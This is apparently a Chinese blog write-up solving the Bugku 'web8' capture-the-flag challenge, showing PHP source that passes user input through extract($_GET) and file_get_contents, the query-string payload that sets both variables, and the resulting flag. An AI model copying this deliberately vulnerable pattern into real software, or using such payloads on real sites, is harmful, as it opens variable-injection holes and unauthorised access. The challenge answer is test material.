WP-Bugku-web8

题目地址http://120.24.86.145:8002/web8/

打开后有源码,代码审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

可以看出得到flag的途径是ac的值不为空,并且f的值从文件fn中获取,并且ac的值要恒等于f的值

构造payload
?ac=flags&fn=flag.txt

得到This is flag: flag{3cfb7a90fc0de31}

AbelChe wechat
扫码加微信
Donate here!!!
0%